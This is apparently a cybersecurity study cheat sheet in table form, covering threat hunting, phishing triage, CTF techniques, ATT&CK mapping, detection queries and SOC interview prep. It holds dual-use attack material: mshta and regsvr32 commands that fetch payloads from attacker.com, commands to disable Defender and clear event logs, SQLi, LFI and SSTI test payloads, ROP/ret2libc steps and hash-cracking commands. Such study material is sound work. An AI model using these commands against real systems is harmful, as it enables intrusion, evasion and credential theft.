| Hybrid Analysis | Free malware sandbox — behavioral and static analysis |
| MISP | Threat intelligence sharing platform — IOC feeds |
| OpenCTI | Open-source CTI platform — structured threat data |
| Talos Intelligence | Cisco Talos — email sender reputation, IP/domain intel |
| GreyNoise | Distinguish targeted attacks from mass internet scanning |
| Have I Been Pwned | Check if emails/passwords in known breaches |
| LSASS access by non-system | Hunt: processes opening lsass.exe with PROCESS_VM_READ that aren't AV/EDR → Mimikatz/cred dumping |
| Encoded PowerShell prevalence | Hunt: count hosts running PS -EncodedCommand — rare hosts running it are suspicious |
| Parent-child anomalies | Hunt: Office apps spawning cmd/powershell/wscript/regsvr32 → macro execution or exploitation |
| Unusual outbound ports | Hunt: endpoints connecting outbound on 4444, 1337, 31337, 8888 — common C2 ports |
| New local admin accounts | Hunt: Event 4720 (account created) + 4732 (added to admin group) within same hour |
| Scheduled task from temp | Hunt: schtasks.exe creating tasks with command in %TEMP%, %APPDATA%, or %PUBLIC% |
| Rare binary on many hosts | Hunt: executable with low prevalence appearing on multiple machines simultaneously → lateral tool drop |
| DNS beaconing | Hunt: same domain queried at regular intervals (±10% jitter) from endpoint → C2 DNS check-in |
| Runkey persistence | Hunt: processes spawned from Run keys that aren't in baseline — compare against approved software list |
| Living off the land | Hunt: certutil, regsvr32, mshta, rundll32 with network connections — LOLBin abuse |
| Check SPF/DKIM/DMARC | Authentication failures are red flags. Check Authentication-Results header — all three should pass for legit mail |
| Sender domain age | Use WHOIS — domains registered <30 days ago are high risk phishing infrastructure |
| URL reputation | Check all links: VirusTotal, URLScan.io, URLVoid. Hover to see real URL vs displayed text |
| Attachment analysis | Never open directly. Upload to Any.Run, Hybrid Analysis, or VirusTotal Sandbox |
| Look-alike domains | micro$oft.com, paypa1.com, arnazon.com — IDN homograph attacks use Unicode chars |
| Urgency + authority | Social engineering signals: "URGENT", "Your account will be suspended", "CEO", "IT Security" |
| Macro-enabled Office | .docm, .xlsm, .xlsb — prompt user to enable macros. Modern orgs should block via policy |
| ISO / LNK attachments | Bypass Mark-of-the-Web. ISO contains LNK → spawns powershell/cmd. Increasing trend since 2021 |
| oletools: olevba malicious.docm | Extract and analyze VBA macros without opening in Office |
| phishtool.com / emailrep.io | Automated phishing email analysis and sender reputation check |
| Event 1 — Process Create | Full command line, parent process, user, hash — most valuable Sysmon event |
| Event 3 — Network Connection | Process making TCP/UDP connections — catch reverse shells and C2 beaconing |
| Event 7 — Image Loaded | DLL loaded by process — detect DLL injection, side-loading |
| Event 8 — CreateRemoteThread | Process injecting thread into another — classic shellcode injection indicator |
| Event 10 — ProcessAccess | Process accessing another — lsass.exe access for cred dumping (Mimikatz) |
| Event 11 — FileCreate | File created/overwritten — detect malware drops, ransomware activity |
| Event 12/13 — Registry | Registry key/value create or set — detect persistence, Run key additions |
| Event 15 — FileCreateStreamHash | Alternate Data Stream (ADS) creation — malware hiding data in NTFS streams |
| Event 17/18 — Pipe | Named pipe create/connect — PsExec, lateral movement via named pipes |
| Event 22 — DNS Query | DNS lookups by process — C2 domain beaconing, DGA detection |
| Base64 | Characters: A-Z a-z 0-9 +/= — ends with = padding. Example: SGVsbG8gV29ybGQ= |
| Base32 | Characters: A-Z 2-7 = — uppercase only, longer than base64. Example: JBSWY3DPEB3W64TMMQ====== |
| Base58 | Like base64 but no 0,O,I,l,+,/ — used in Bitcoin addresses. Example: 5HueCGU8rMjxECyDQpsmaue5 |
| Base85 / Ascii85 | Dense encoding, 5 chars per 4 bytes, starts with <~ ends with ~> |
| Hex | Characters: 0-9 a-f, always even length. Example: 48656c6c6f = "Hello" |
| Binary | Only 0s and 1s, usually in groups of 8. 01001000 01101001 = "Hi" |
| Octal | Digits 0-7 only. Often prefixed with 0. 110 145 154 154 157 = "Hello" |
| Morse Code | Dots and dashes separated by spaces. .... . .-.. .-.. --- = "HELLO" |
| ROT13 | Letters only shifted 13. Recognizable: readable English but with wrong letters. Apply ROT13 again to decode. |
| Caesar Cipher | Shifted alphabet — try all 26 shifts. Letters shift by N positions. |
| Atbash | A↔Z B↔Y — mirror of alphabet. Self-inverse (decode = encode again). |
| URL Encoding | %XX format where XX is hex. Space = %20, / = %2F, @ = %40 |
| HTML Entities | & < > &#decimal; &#xhex; format |
| JWT | Three base64url parts separated by dots: header.payload.signature — starts with eyJ |
| Bacon Cipher | Uses A and B (or two symbols) in groups of 5. AAAAA=A AAAAB=B etc. |
| Vigenère | Polyalphabetic cipher with keyword. Use frequency analysis + Kasiski test to find key length. |
| strings image.png | Extract printable strings from binary — hidden text, flags |
| file image.xxx | Check actual file type — mismatched extension is a hint |
| xxd image.png | head -20 | Check magic bytes and file structure |
| exiftool image.jpg | Read EXIF metadata — coordinates, software, description, author, comments |
| binwalk -e file | Extract embedded files — ZIP, PNG, ELF hidden inside another file |
| zsteg image.png | LSB steganography detector for PNG/BMP — checks all bit planes |
| steghide extract -sf image.jpg | Extract data hidden with steghide (may need passphrase) |
| stegsolve.jar | Visual steg analysis — bit planes, color filters, XOR between images |
| audacity (spectrogram view) | Hidden messages in audio spectrograms — use Spectrogram view mode |
| sonic-visualiser | Advanced audio analysis — better spectrogram + waveform tools |
| foremost / photorec | File carving from disk images or raw data streams |
| pngcheck -v image.png | Check PNG chunks — hidden tEXt, zTXt, or unknown chunks |
| LSB pattern | If image has slightly off colors or large file size — check least significant bits of RGB channels |
| Check IDAT chunks | Extra data after IEND marker in PNG = appended content. Use: xxd file | grep -A2 "IEND" |
| RSA — small N | Factor N with factordb.com or yafu — if N is small enough, get p and q → compute d |
| RSA — e=3, small m | Cube root attack — if m^3 < N, then c^(1/3) = m directly |
| RSA — common factor | Two public keys sharing a prime: gcd(N1, N2) = p → factor both keys |
| XOR with short key | Frequency analysis + known plaintext (e.g., flag starts with "CTF{"). Try key lengths 1-20. |
| Repeating XOR | Kasiski test for key length → frequency analysis each column → solve each key byte |
| ECB Mode | Same plaintext block → same ciphertext block. Detect: identical blocks in ciphertext → ECB mode. |
| CBC Bit-Flip | Flip bits in ciphertext block N to control plaintext of block N+1 |
| Padding Oracle | If "padding error" vs "decryption error" differ — PKCS#7 padding oracle attack. Tool: padbuster |
| MD5 Length Extension | If MAC = MD5(secret||message), use hashpump to extend message without knowing secret |
| AES ECB Prefix Attack | Control prefix before secret — one byte at a time → brute force each byte |
| Discrete Log (DLP) | If g^x mod p with small p — use Baby-step Giant-step or Pohlig-Hellman |
| Hash Collision (MD5) | MD5 is broken — two different files with same MD5 exist. Check CTF for md5collgen tool. |
| FF D8 FF | JPEG image |
| 89 50 4E 47 0D 0A 1A 0A | PNG image |
| 47 49 46 38 | GIF image (GIF8) |
| 50 4B 03 04 | ZIP archive (also .docx, .xlsx, .jar, .apk) |
| 52 61 72 21 | RAR archive (Rar!) |
| 1F 8B 08 | GZIP compressed |
| 42 5A 68 | BZIP2 compressed (BZh) |
| 7F 45 4C 46 | ELF binary (Linux executable) |
| 4D 5A | PE executable (MZ) — Windows .exe / .dll |
| 25 50 44 46 | PDF (%PDF) |
| D0 CF 11 E0 | Microsoft Office (old .doc, .xls format) |
| 7B 0A or 7B 22 | JSON ({) |
| 3C 3F 78 6D 6C | XML (<?xml) |
| CA FE BA BE | Java class file |
| FD 37 7A 58 5A 00 | XZ compressed |
| file * 2>/dev/null | Identify all files in current directory |
| xxd file | head -5 | First 5 lines hex dump — check magic bytes |
| strings -n 6 file | grep -i "flag\|ctf\|key" | Search for flag strings (min 6 chars) |
| strings file | grep -E "^[A-Za-z0-9+/]{20,}={0,2}$" | Find base64 strings in binary |
| python3 -c "print(bytes.fromhex('48656c6c6f'))" | Decode hex to ASCII |
| echo "SGVsbG8=" | base64 -d | Decode base64 |
| cat file | tr 'A-Za-z' 'N-ZA-Mn-za-m' | ROT13 decode via tr |
| python3 -c "import base64; print(base64.b32decode('JBSWY3DP'))" | Decode Base32 |
| objdump -d -M intel binary | less | Disassemble binary (Intel syntax) |
| ltrace ./binary | Trace library calls — see strcmp, strncmp calls (check password comparisons) |
| strace ./binary | Trace syscalls — see file opens, network connections |
| gdb -q ./binary | Debug binary. info functions, disas main, break *main+offset |
| chmod +x file && ./file | Make executable and run |
| zip2john archive.zip > hash.txt && john hash.txt | Crack ZIP password with John |
| View page source | Ctrl+U — check comments, hidden fields, JavaScript, inline flags |
| Check robots.txt | /robots.txt — disallowed paths often contain interesting endpoints |
| Check /.git/ | Exposed .git directory — download with git-dumper, recover source code |
| Check /backup/ /old/ /.bak | Common backup file locations and extensions |
| gobuster dir -u URL -w /usr/share/wordlists/dirb/common.txt | Directory brute force |
| curl -v URL 2>&1 | grep -i "flag\|secret\|key" | Check response headers for hidden data |
| SQLi in every parameter | Try: ' " ; -- ) 1' OR '1'='1 — watch for errors or behavior changes |
| LFI: ?file=../../../etc/passwd | Check all file parameters for directory traversal |
| SSTI: {{7*7}} or ${7*7} | Test template injection — output of 49 = vulnerable |
| Check cookies | Decode cookie value — base64, JWT, serialized objects, signed sessions |
| Inspect JS files | Look for API keys, hardcoded passwords, hidden endpoints, commented-out code |
| IDOR: change user ID | Change id=1 to id=2 in URL or body — access other users' data |
| CyberChef | gchq.github.io/CyberChef — Swiss army knife for encoding, crypto, analysis |
| dcode.fr | Cipher identifier + decoder for 200+ historical ciphers |
| factordb.com | Factor large integers — RSA n factoring |
| quipqiup.com | Substitution cipher solver using frequency analysis |
| md5hashing.net / crackstation | Online hash lookup / rainbow tables |
| RsaCtfTool | github.com/RsaCtfTool — automates common RSA attacks |
| pwntools | Python CTF framework — exploit writing, format strings, ROP chains |
| Ghidra / IDA Free | Reverse engineering / decompilation for binaries |
| Volatility 3 | Memory forensics framework — process analysis, network, registry |
| Wireshark | PCAP analysis — filter, follow streams, export objects |
| file-recovery.com / undelete.online | Recover deleted files from disk images |
| CTFtime.org | Upcoming CTF competitions, team rankings, past writeups |
| HackTheBox / TryHackMe | Practice labs and challenges |
| PicoCTF | Beginner-friendly CTF with free archive of past challenges |
| python3 -c "print('A'*200)" | ./binary | Send cyclic pattern to find crash — increase length until SIGSEGV |
| cyclic 200 (pwntools) | Generate De Bruijn sequence — find exact offset from crash value |
| cyclic -l 0x61616161 | Find offset from EIP value after crash |
| checksec ./binary | Check protections: RELRO, Stack Canary, NX, PIE, ASLR |
| ROPgadget --binary ./binary | grep "pop rdi" | Find ROP gadgets for ret2libc or ROP chain building |
| ropper -f ./binary --search "pop rdi" | Alternative ROP gadget finder |
| ldd ./binary | Show linked libraries — find libc address for ret2libc |
| readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep " system" | Find system() offset in libc |
| strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh" | Find /bin/sh string offset in libc |
| gdb -q ./binary → run → info registers → x/20xw $esp | GDB: crash, dump registers, inspect stack |
| pwndbg / peda / gef | GDB plugins that add heap visualization, ROP chain tools, and pattern searching |
| from pwn import *; p = process('./binary'); p.sendline(payload) | Pwntools script skeleton for local exploit |
| hashcat -m 0 hash.txt rockyou.txt | MD5 dictionary attack |
| hashcat -m 1000 hash.txt rockyou.txt | NTLM hash cracking |
| hashcat -m 1800 hash.txt rockyou.txt | sha512crypt ($6$) — Linux /etc/shadow |
| hashcat -m 13100 hash.txt rockyou.txt | Kerberoast (TGS-REP) |
| hashcat -m 18200 hash.txt rockyou.txt | AS-REP Roast hash |
| hashcat -a 3 hash.txt ?a?a?a?a?a?a | Brute force all 6-char combinations (all charsets) |
| hashcat -r rules/best64.rule hash.txt rockyou.txt | Rule-based mutation — password1, Password!, P@ssw0rd etc. |
| john --format=NT hash.txt --wordlist=rockyou.txt | John the Ripper — NTLM cracking |
| john --rules --wordlist=rockyou.txt hash.txt | John with mangling rules |
| hashid hash.txt | Identify hash type from format/length |
| hash-identifier | Interactive hash type identification |
| crackstation.net / hashes.com | Online rainbow table lookup — fast for common hashes |
| tcpdump -r file.pcap -n | Read PCAP and display packets (no DNS resolution) |
| tcpdump -r file.pcap -n 'port 80' -A | Filter HTTP traffic and show ASCII payload |
| networkMiner file.pcap | GUI PCAP analyzer — auto-extracts files, credentials, sessions |
| zeek -r file.pcap | Zeek (Bro) — generate connection/DNS/HTTP/SSL logs from PCAP |
| zeek-cut id.orig_h id.resp_h id.resp_p proto < conn.log | sort | uniq -c | Top connections from Zeek conn.log |
| tshark -r file.pcap -Y "http.request" -T fields -e http.host -e http.request.uri -e http.request.method | Extract all HTTP requests |
| Follow TCP Stream in Wireshark | Right-click any packet → Follow → TCP Stream to reconstruct full session |
| File → Export Objects → HTTP/SMB/FTP | Extract transferred files from PCAP in Wireshark |
| strings file.pcap | grep -E "password|passwd|credential" | Quick credential search in raw PCAP bytes |
| ngrep -I file.pcap -q 'USER|PASS' tcp | Pattern match across packet payloads (like grep for packets) |
| Tactic | ID | Key Techniques |
|---|---|---|
| Reconnaissance | TA0043 | T1595 Active Scanning · T1590 Gather Victim Network Info · T1589 Gather Victim Identity · T1598 Phishing for Info |
| Resource Development | TA0042 | T1583 Acquire Infrastructure · T1584 Compromise Infrastructure · T1587 Develop Capabilities · T1586 Compromise Accounts |
| Initial Access | TA0001 | T1566 Phishing · T1190 Exploit Public-Facing App · T1133 External Remote Services · T1195 Supply Chain Compromise · T1078 Valid Accounts |
| Execution | TA0002 | T1059 Command & Scripting (PowerShell/Bash/cmd) · T1053 Scheduled Task · T1047 WMI · T1204 User Execution · T1203 Exploitation for Client Exec |
| Persistence | TA0003 | T1547 Boot/Logon Autostart (Run Keys) · T1053 Scheduled Task · T1543 Create/Modify System Process · T1136 Create Account · T1078 Valid Accounts |
| Privilege Escalation | TA0004 | T1548 Abuse Elevation Control (UAC Bypass) · T1134 Token Manipulation · T1068 Exploit for PrivEsc · T1055 Process Injection · T1611 Escape to Host |
| Defense Evasion | TA0005 | T1036 Masquerading · T1055 Process Injection · T1027 Obfuscated Files · T1562 Impair Defenses (disable AV/logs) · T1070 Indicator Removal · T1218 Signed Binary Proxy (LOLBAS) |
| Credential Access | TA0006 | T1110 Brute Force · T1003 OS Credential Dumping (LSASS/Mimikatz) · T1558 Kerberoasting / AS-REP Roasting · T1555 Credentials from Password Stores · T1056 Keylogging |
| Discovery | TA0007 | T1082 System Info · T1083 File & Dir Discovery · T1087 Account Discovery · T1018 Remote System Discovery · T1049 Network Connections · T1069 Permission Groups (AD) |
| Lateral Movement | TA0008 | T1021 Remote Services (RDP/WinRM/SMB) · T1550 Pass-the-Hash/Ticket · T1210 Exploit Remote Services · T1534 Internal Spearphishing · T1570 Lateral Tool Transfer |
| Collection | TA0009 | T1005 Data from Local System · T1039 Data from Network Shared Drive · T1115 Clipboard · T1113 Screen Capture · T1560 Archive Collected Data · T1056 Input Capture |
| Command & Control | TA0011 | T1071 App Layer Protocol (HTTP/S/DNS) · T1572 Protocol Tunneling · T1573 Encrypted Channel · T1090 Proxy · T1095 Non-App Layer (raw TCP/UDP) · T1102 Web Service (C2 via Pastebin/GitHub) |
| Exfiltration | TA0010 | T1041 Exfil Over C2 Channel · T1567 Exfil Over Web Service (cloud storage) · T1048 Exfil Over Alt Protocol (DNS/ICMP) · T1020 Automated Exfiltration · T1030 Data Transfer Size Limits |
| Impact | TA0040 | T1486 Data Encrypted (Ransomware) · T1490 Inhibit System Recovery (VSS delete) · T1489 Service Stop · T1485 Data Destruction · T1498 Network DoS · T1491 Defacement |
| Rank | Technique | ID | Why It Matters |
|---|---|---|---|
| 1 | PowerShell | T1059.001 | Widely abused for download-cradles, encoded commands, LOLBins |
| 2 | Windows Command Shell | T1059.003 | cmd.exe used in chained execution, batch scripts, persistence |
| 3 | Scheduled Task | T1053.005 | Common persistence and lateral execution mechanism |
| 4 | OS Credential Dumping: LSASS | T1003.001 | Mimikatz, Task Manager, procdump targeting lsass.exe |
| 5 | Ingress Tool Transfer | T1105 | certutil, bitsadmin, curl, Invoke-WebRequest downloading payloads |
| 6 | Masquerading | T1036 | Malware named svchost.exe, lsass.exe, or placed in System32 |
| 7 | Process Injection | T1055 | Shellcode injection into legitimate processes (explorer, notepad) |
| 8 | Windows Management Instrumentation | T1047 | WMI for lateral movement, persistence, remote execution |
| PowerShell encoded cmd | process.name = "powershell.exe" AND process.args = "*-enc*" |
| LSASS access | event.action = "OpenProcess" AND target.process.name = "lsass.exe" |
| Scheduled task creation | event.code = 4698 OR (process.name = "schtasks.exe" AND process.args = "*/create*") |
| Lateral movement via SMB | event.code = 4624 AND winlog.event_data.LogonType = "3" AND source.ip != "127.0.0.1" |
| Shadow copy deletion | process.command_line CONTAINS "vssadmin" AND process.command_line CONTAINS "delete shadows" |
| Defender disabled | event.code = 5001 OR process.command_line CONTAINS "Set-MpPreference -DisableRealtimeMonitoring $true" |
| DNS beaconing (Splunk) | index=dns | stats count by src_ip, query | where count > 100 | sort -count |
| Kerberoasting | event.code = 4769 AND winlog.event_data.TicketEncryptionType = "0x17" |
| mitre-attack.github.io/attack-navigator | Color-code techniques by detection coverage, threat actor, or campaign |
| Threat actor mapping | Search ATT&CK for a group (e.g., APT29) to see all their known techniques |
| Coverage heatmap | Export current detections as JSON → import into Navigator to visualize gaps |
| SIGMA rules | github.com/SigmaHQ/sigma — community detection rules mapped to ATT&CK techniques |
| D3FEND | d3fend.mitre.org — defensive countermeasures mapped to ATT&CK techniques |
| Group | Attribution | Known For |
|---|---|---|
| APT29 (Cozy Bear) | Russia / SVR | SolarWinds supply chain (2020), spearphishing, OPSEC-heavy TTP, WellMess / SUNBURST malware |
| APT28 (Fancy Bear) | Russia / GRU | DNC hack (2016), VPNFilter, X-Agent/SOURFACE, password spraying against govt targets |
| Lazarus Group | North Korea / RGB | Sony breach (2014), WannaCry (2017), SWIFT banking theft, crypto exchange targeting |
| APT41 (Double Dragon) | China / MSS | Dual espionage + cybercrime, supply chain attacks, gaming industry financial fraud |
| APT10 (Stone Panda) | China / MSS | MSP targeting — Cloud Hopper campaign, stole IP from 45+ countries via managed service providers |
| Sandworm | Russia / GRU Unit 74455 | Ukrainian power grid attacks (2015/2016), NotPetya (2017), Olympic Destroyer (2018) |
| FIN7 (Carbanak) | Financial crime group | Point-of-sale malware, restaurant/hotel targeting, CARBANAK banking trojan |
| Scattered Spider | English-speaking group | MGM/Caesars breach (2023), SIM swapping, social engineering IT helpdesks for access |
| Cl0p | Russian-speaking eCrime | MOVEit zero-day exploitation (2023), mass data extortion, no ransomware — pure extortion |
| T1036.003 — Rename System Utilities | Copy cmd.exe to svchost.exe, place in writable dir — bypasses name-based detection |
| T1218.011 — Rundll32 | rundll32.exe javascript: or DLL execution — proxy execution to bypass AV |
| T1218.005 — Mshta | mshta.exe http://attacker.com/payload.hta — execute remote HTA file |
| T1218.010 — Regsvr32 | regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll — Squiblydoo technique |
| T1027.002 — Obfuscated Files (Software Packing) | UPX packed malware, custom packers, VM-protected code to bypass static analysis |
| T1070.001 — Clear Windows Event Logs | wevtutil cl Security / System / Application — attacker covering tracks |
| T1562.001 — Disable Windows Defender | Set-MpPreference -DisableRealtimeMonitoring $true or via Group Policy |
| T1134.002 — Token Impersonation | Steal token from SYSTEM process → impersonate SYSTEM. Implemented in Metasploit getsystem |
| T1055.001 — DLL Injection | VirtualAllocEx + WriteProcessMemory + CreateRemoteThread into target process |
| T1055.012 — Process Hollowing | SpawnSuspended(svchost.exe) → NtUnmapViewOfSection → WriteProcessMemory → ResumeThread |
| title | Short descriptive name of what the rule detects |
| status: experimental / test / stable | Maturity level — experimental rules have higher FP rate |
| logsource: category / product / service | Where to apply: category: process_creation, product: windows, service: security |
| detection: selection + condition | selection defines what to match; condition says how to combine (selection and not filter) |
| falsepositives | Known sources of false positives — helps analysts tune rules |
| tags: attack.t1059.001 | Maps to ATT&CK technique — enables Navigator coverage mapping |
| sigmac / pySigma | Convert SIGMA rules to Splunk SPL, KQL, EQL, Lucene, Elastic rule format |
| sigma-cli convert -t splunk rule.yml | Convert SIGMA rule to Splunk SPL query |
| CIA Triad | Confidentiality (only authorized access) · Integrity (data unchanged) · Availability (systems accessible). Ransomware attacks all three. |
| IDS vs IPS | IDS = passive, detects and alerts. IPS = inline, detects and blocks. IDS has no impact on traffic; IPS can cause latency and false-block legitimate traffic. |
| SIEM | Collects, normalizes, and correlates logs from multiple sources. Generates alerts via correlation rules. Provides search, dashboards, and long-term log retention for investigations. |
| False Positive vs False Negative | FP: alert fires on benign activity (alert fatigue). FN: real attack is missed (silent failure). FNs are more dangerous; FPs waste analyst time. |
| Risk = Threat × Vulnerability × Impact | Patch reduces vulnerability. Controls reduce impact. Threat intel helps prioritize which threats to focus on. |
| Defense in Depth | Multiple layers of controls: perimeter (firewall/IPS) → network (segmentation) → endpoint (EDR/AV) → application (WAF) → data (encryption/DLP) → identity (MFA). |
| Zero Trust | "Never trust, always verify." No implicit trust based on network location. Continuous verification of identity, device health, and least-privilege access. |
| Least Privilege | Users/services get only the minimum access required. Limits blast radius of compromise. Implement with RBAC, PAM, and regular access reviews. |
| 6 IR Phases (NIST) | 1. Preparation → 2. Identification → 3. Containment → 4. Eradication → 5. Recovery → 6. Lessons Learned |
| Containment vs Eradication | Containment: stop the spread (isolate host, block IP, disable account). Eradication: remove the threat (delete malware, patch vuln, reset creds). Do containment first — eradication without containment lets attackers persist. |
| Ransomware Response | 1. Isolate infected systems (network block). 2. Identify patient zero and initial vector. 3. Preserve volatile data (RAM, running processes). 4. Check backups before paying. 5. Notify legal/compliance. 6. Rebuild from clean image. |
| Chain of Custody | Documented record of who collected, handled, and transferred evidence. Maintains evidence integrity for legal proceedings. Hash all collected artifacts immediately. |
| Order of Volatility | RAM → swap/pagefile → network connections → running processes → disk → backups. Collect most volatile first to avoid losing data when system restarts. |
| Triage vs Full Forensics | Triage: fast collection of key artifacts (prefetch, event logs, registry) for quick decisions. Full forensics: complete disk image for deep analysis. Choose triage when you have many machines to process. |
| Pass-the-Hash | Using a captured NTLM hash to authenticate without knowing the plaintext password. Mitigate: Credential Guard, disable NTLM where possible, use Protected Users group, network segmentation. |
| Kerberoasting | Request TGS tickets for service accounts, crack the RC4-encrypted ticket offline. Detect: event 4769 with encryption type 0x17. Mitigate: strong service account passwords (25+ chars), AES enforcement. |
| AS-REP Roasting | Attack accounts with "Do not require Kerberos pre-authentication" — request AS-REP, crack hash offline. Event 4768. Mitigate: require pre-auth for all accounts. |
| Living Off the Land (LOLBAs) | Using built-in OS binaries for malicious purposes (certutil, mshta, regsvr32, rundll32, wscript). Evades AV. Detect via process tree anomalies and unusual parent-child relationships. |
| SQL Injection | Inserting SQL syntax into input fields to manipulate database queries. Types: in-band, blind, out-of-band. Prevent: parameterized queries / prepared statements, input validation, WAF. |
| Lateral Movement Detection | Look for: unusual SMB connections (4624 Type 3), new service installs on remote hosts (7045), admin share access (\\host\ADMIN$), WMI network activity, PsExec artefacts (PSEXESVC service). |
| Beaconing | Regular C2 check-ins from compromised host. Detect: high frequency DNS queries to same domain, regular time-interval outbound connections, large number of requests to a single IP, low byte payloads at fixed intervals. |
| Process Hollowing | Start a legitimate process suspended, replace its memory with malicious code, resume. Detect: PE image path ≠ on-disk file, unusual memory regions in known processes. |
| 1000 failed logins → 1 success | 1. Check geo/IP of success vs failures. 2. Determine what account and resource was accessed. 3. If suspicious: force password reset, invalidate sessions, isolate host, investigate post-auth activity. Classic brute force/credential stuffing pattern. |
| User opened email attachment, PC slow | 1. Isolate host from network immediately. 2. Take memory dump if possible. 3. Check running processes, network connections (netstat), scheduled tasks, startup entries. 4. Check email server for other recipients. 5. Preserve evidence, then reimage. |
| Alert: cmd.exe spawned by Word.exe | Almost always malicious — indicates macro execution or exploitation. 1. Isolate host. 2. Identify parent-child chain and command line arguments. 3. Check for network connections. 4. Look for dropped files. 5. Map to ATT&CK T1566 + T1059. |
| Alert: PowerShell with -EncodedCommand | Decode the base64 payload. Tools: CyberChef, PowerShell: [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("...")). Determine what it downloads/executes. Check VirusTotal for any dropped hashes. |
| Unusual outbound DNS traffic | Check for: long DNS names (DNS tunneling indicator), high frequency queries (beaconing), uncommon TLDs, queries to newly registered domains. Tools: Zeek DNS logs, Splunk/SIEM. Confirm with threat intel lookup. |
| TCP 3-Way Handshake | SYN → SYN-ACK → ACK. A half-open connection (SYN flood) can indicate DoS or port scanning. RST from server = port closed. No response = filtered by firewall. |
| Common Attack Ports | 22 (SSH brute), 23 (Telnet), 25 (SMTP relay), 445 (SMB — EternalBlue), 1433 (MSSQL), 3389 (RDP brute), 4444 (Metasploit default), 5985/5986 (WinRM), 8080 (proxy/web), 9001 (Tor) |
| DNS Record Types | A (IPv4), AAAA (IPv6), MX (mail), TXT (SPF/DKIM/DMARC), CNAME (alias), NS (nameserver), SOA (zone authority), PTR (reverse DNS) |
| Subnetting | /8 = 16M hosts, /16 = 65K hosts, /24 = 254 hosts, /25 = 126 hosts, /26 = 62 hosts, /27 = 30 hosts, /28 = 14 hosts, /30 = 2 hosts (point-to-point) |
| Splunk / ELK / Microsoft Sentinel | SIEM platforms for log aggregation, correlation, and alerting. Know SPL (Splunk), KQL (Sentinel), and Lucene/EQL (Elastic). |
| Wireshark / Zeek / Suricata | Network analysis and IDS. Know how to filter, follow streams, export objects, and write Suricata rules. |
| CrowdStrike / SentinelOne / Defender for Endpoint | EDR platforms. Know how to query telemetry, contain hosts, and pivot from alerts to processes to network to files. |
| Volatility | Memory forensics. Know: imageinfo, pslist, pstree, netscan, malfind, cmdscan, filescan. Used in malware analysis and IR to detect in-memory threats. |
| Nmap | Network discovery and port scanning. Know: -sV (version), -sC (scripts), -O (OS detection), -A (aggressive), --script vuln (vulnerability scan). |
| Static vs Dynamic analysis | Static: examine without executing (strings, PE headers, disassembly). Dynamic: run in sandbox and observe behavior (file drops, network, registry). Always do static first to understand before running. |
| How do you safely analyze malware? | Isolated VM with snapshots, no network or host-only network, shared clipboard disabled. Use REMnux or FlareVM. Never run on production or connected systems. |
| What is packed malware? | Malware compressed/encrypted to hide code from static analysis. Signs: high entropy, small import table, UPX headers. Unpack: UPX -d, OllyDbg OEP finding, dynamic unpacking via memory dump. |
| Indicators from dynamic analysis | File creates/deletes, registry persistence (Run keys), network connections, mutex creation, process injection, API calls (CreateRemoteThread, VirtualAllocEx), DNS queries |
| What is DGA? | Domain Generation Algorithm — malware generates pseudo-random domains daily for C2. Attacker registers one domain; defender can't pre-block all. Detect via high entropy domain names, NXDomain storm, lexical analysis. |
| Difference: Trojan / Worm / Rootkit / RAT | Trojan: hides as legit software. Worm: self-replicating via network. Rootkit: hides itself/other malware at OS/kernel level. RAT: Remote Access Trojan — full remote control for attacker. |
| Tools for Windows malware analysis | PE-bear / PEStudio (static), x64dbg / Ghidra (reverse engineering), ProcMon / ProcExp (dynamic), Wireshark (network), Regshot (registry diff), FakeNet-NG (network simulation) |
| Shared Responsibility Model | Cloud provider secures of the cloud (hardware, hypervisor, physical). Customer secures in the cloud (OS, data, IAM, network config). Misunderstanding this is the #1 cloud breach cause. |
| What is IAM and least privilege in AWS? | Identity & Access Management. Principle: grant only permissions needed. Use IAM roles (not users) for services, never use root account, enable MFA on all accounts, rotate access keys. |
| How are S3 buckets exposed? | Public ACLs, misconfigured bucket policies, Block Public Access not enabled, pre-signed URLs exposed. Check: aws s3api get-bucket-acl + get-bucket-policy. Remediate: enable S3 Block Public Access at org level. |
| What is IMDS and why is it dangerous? | Instance Metadata Service (169.254.169.254) exposes IAM credentials to anything running on the instance. SSRF vulnerability can access it. Mitigation: IMDSv2 (requires session token), block from application network namespace. |
| Detect compromised IAM credentials | CloudTrail: unusual API calls (unfamiliar regions, new services), GetCallerIdentity from unexpected IPs, IAM policy changes, new user/key creation. GuardDuty automates this detection. |
| What are Security Groups vs NACLs? | Security Groups: stateful, instance-level, allow only (no explicit deny). NACLs: stateless, subnet-level, allow and deny rules, evaluated in order. Use both: NACLs for broad blocks, SGs for fine-grained control. |
| NIST CSF | 5 Functions: Identify → Protect → Detect → Respond → Recover. Framework for building and improving cybersecurity programs. Not prescriptive — maps to existing standards. |
| ISO 27001 | International ISMS standard. Requires risk assessment, Statement of Applicability, 114 controls in Annex A. Certification requires external audit. |
| PCI DSS | Payment Card Industry Data Security Standard. 12 requirements for handling cardholder data. Applies to any org storing/processing/transmitting card data. Annual assessment or quarterly scans. |
| GDPR | EU data protection regulation. Requires: lawful basis for processing, breach notification within 72 hours, right to erasure, data minimization. Fines up to 4% of global revenue. |
| HIPAA | US healthcare data. Protected Health Information (PHI) must be secured. Safeguards: Administrative (policies), Physical (access controls), Technical (encryption, audit controls). |
| SOC 2 | Service Organization Controls. Type I: design of controls at a point in time. Type II: operating effectiveness over 6-12 months. 5 Trust Service Criteria: Security, Availability, Confidentiality, Processing Integrity, Privacy. |
| CIS Controls v8 | 18 prioritized controls for cyber defense. IG1 (basic hygiene), IG2 (mid-size orgs), IG3 (mature orgs). Control 1: Asset Inventory. Control 4: Secure Config. Control 6: Access Control Mgmt. |
| IOC Type | Example | Notes |
|---|---|---|
| IP Address | 185.220.101.42 | Can be exit nodes (Tor/VPN) — verify before blocking. Check ASN ownership. |
| Domain | evil-payload.ru | Check registration date — newly registered domains are high risk. Use WHOIS + passive DNS. |
| URL | http://evil.com/update.exe | Full path matters — same domain may have both malicious and benign paths. |
| File Hash (MD5) | d41d8cd98f00b204e9800998ecf8427e | Easily defeated by changing one byte. Use SHA-256 or fuzzy hashes (ssdeep/TLSH) for better coverage. |
| File Hash (SHA-256) | e3b0c44298fc1c149af...bfc | Gold standard for file IOCs. Query VirusTotal/MalwareBazaar. |
| Email Address | attacker@phishing-domain.com | Sender can be spoofed — also check SPF/DKIM/DMARC alignment, not just the From field. |
